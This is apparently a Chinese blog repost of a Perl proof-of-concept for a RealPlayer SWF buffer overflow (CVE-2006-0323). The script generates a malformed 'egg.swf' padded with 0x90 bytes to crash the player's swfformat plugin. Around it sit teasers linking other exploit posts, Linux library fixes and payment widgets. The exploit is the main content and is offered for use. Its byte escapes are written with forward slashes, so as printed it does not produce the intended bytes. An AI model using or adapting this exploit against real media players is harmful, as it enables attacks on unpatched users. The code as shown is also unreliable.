RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC

最新推荐文章于 2018-04-27 11:57:50 发布
最新推荐文章于 2018-04-27 11:57:50 发布
阅读量1k 收藏
点赞数
分类专栏: 溢出技术 文章标签: buffer header signal thread url
CODE:
#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323[/url]
#
# RealNetworks Advisory
# [url]http://service.real.com/realplayer/security/03162006_player/en/[/url]
#
# Federico L. Bossi Bonin
# fbossi[at]netcomm.com.ar
###################################################

# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so

my $EGGFILE="egg.swf";
my $header="/x46/x57/x53/x05/xCF/x00/x00/x00/x60";

my $endheader="/x19/xe4/x7d/x1c/xaf/xa3/x92/x0c/x72/xc1/x80/x00/xa2/x08/x01".
        "/x00/x00/x00/x00/x01/x02/x00/x01/x00/x00/x00/x02/x03/x00/x02".
        "/x00/x00/x00/x04/x04/x00/x03/x00/x00/x00/x08/x05/x00/x04/x00".
        "/x00/x00/x00/x89/x06/x06/x01/x00/x01/x00/x16/xfa/x1f/x40/x40".
        "/x00/x00/x00";


open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE/n";
print EGG $header;

for ($i = 0; $i < 135; $i++) {
$buffer.= "/x90";
}

print EGG $buffer;
print EGG $endheader;
close(EGG);

 
HappyQQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
渗透攻击基础
weixin_30834019的博客
07-14 4475
Metasploit框架中包涵数百个模块,没有人能用脑子把它们的名字全部记下来。在MSF终端中运行show命令会把所有的模块显示出来,也可以指定模块的类型来缩小搜索范围。 1. msf > show exploits Exploits ======== Name ...
RealPlayer的漏洞
hejian10的专栏
04-10 257
Real Player 控件溢出漏洞。在环境 Windows XP SP2(fully patched) English, IE6测试成功运行calc。该漏洞存在于rmoc3260.dll,并且只有 version 6.0.10.45可以被成功执行漏洞攻击。在最新版本以及旧版本没有办法成功执行该漏洞。该DLL版本对应的REAL版本号为:6.0.14.748。 
Linux下libstdc++.so.5找不到解决方案
zhangdd的博客
04-27 8211
在Linux系统安装程序时经常遇到“libstdc++.so.5找不到”的问题,例如提示“libstdc++.so.5: cannot open shared object file: No such file or directory”。从网上找资料和亲手实践后,把解决方法描述如下:CentOS/fedora在Terminal窗口中运行:# yum whatprovides libstdc++....
找不到libstdc++.so.5解决方案
IT人生
04-05 8058
方法一: yum install libstdc++.so.5 方法二: ln -s /usr/lib/libstdc++.so.6 /usr/lib/libstdc++.so.5 这是在安装了libstdc++.so.6才可以的
Linux下安装RealPlayer过程与问题(ubuntu版)
nihao_2008的专栏
09-29 2560
在Ubuntu操作系统中安装Realplayer时,经常是提到只要用sudo apt-get install realplayer命令就可以解决了,但是事实中这个命令总是不能解决问题,我们在实际使用这个命令只能得到以下的结果。正在读取软件包列表... 完成正在分析软件包的依赖关系树       Reading state information... 完成      现在没有可用的软件包 real
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行...
weblogic_poc.cve-2018-2628.rar_cve-2018-2628_weblogic
09-20
验证是否存在cve-2018-2628漏洞
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
在本例中,`CVE-2017-3506-Poc.py`是一个Python脚本,用于演示如何利用这个漏洞。攻击者可以创建一个带有特定`Content-Type`的HTTP请求,触发Struts2框架的错误解析逻辑,从而执行恶意代码。这个PoC可能包括了以下...
uc-httpd-1.0.0-buffer-overflow-exploit:uc-httpd 1.0.0缓冲区溢出漏洞利用PoC
05-10
uc-httpd-1.0.0-buffer-overflow-exploit [熊麦uc-httpd 1.0.0缓冲区溢出漏洞利用概念证明] 概念证明代码:0dayPoC.py CVE-2018-10088 感谢CVE分配团队为构建以下内容提供的帮助: [描述] 通过XiongMai uc-httpd ...
Linux 下安装 RealPlayer 的问题及解决办法
深入敌后
06-03 2365
我在 Fedora 4/5 下安装 RealPlayer 时,遇到 error while loading shared libraries: libstdc++.so.5: cannot open shared object file: No such file or directory 的错误,其实是少了 libstdc++.so.5 文件,是因为这个库已过时,已被新的库代替,但一些老版本的软
error while loading shared libraries: libstdc++.so.6
热门推荐
祝 枫
05-27 1万+
在编译busybox过程中,配置好make menuconfig后,在make编译时提示: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or direcory。 在官方文件中发现有两个包包含这个文件  一个是libstdc++6 
linux下RealPlayer 安装解决 libstdc++.so.5的依赖问题
vrix的专栏
09-07 3051
yum install libstdc++.so.5就这么简单的方法,就可以解决,当然前提是你的PC联网,我也是找了好久之后,无意中发现这个方法。之前费了好多时间都没有搞出来,都有些失望了。既然解决了依赖问题,你要作的 就是 下载最新的  RealPlayer (LINUX版本哦),然后 安装。
Source Insight 4.0.zip
08-14
Source Insight 4.0.zip
基础会计教学课件第四章账户与复式记账.pptx
最新发布
08-14
基础会计教学课件第四章账户与复式记账.pptx
L型热电偶和U型热电偶电压温度双向转换器
08-14
L型热电偶和U型热电偶电压温度双向转换器
<div class="w"> <div id="slideshow"> <img src="../images/pop.gif" onclick="fun()" alt="" style="width: 600px;height: 450px;margin-left: 5px;"> <img src="../images/poc.gif" onclick="fun()" alt="" style="width: 600px;height: 450px;margin-left: 5px;"> </div> <script> function fun() { var a = Math.random() * 5; $('img').attr('src', '../images/pop.gif' + a + '../images/poc.gif'); } </script> </div>无法实现
06-03
<img src="../images/poc.gif" onclick="fun()" alt="" style="width: 600px;height: 450px;margin-left: 5px;"> </div> <script> function fun() { var paths = ['../images/pop.gif', '../images/poc.gif']; ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值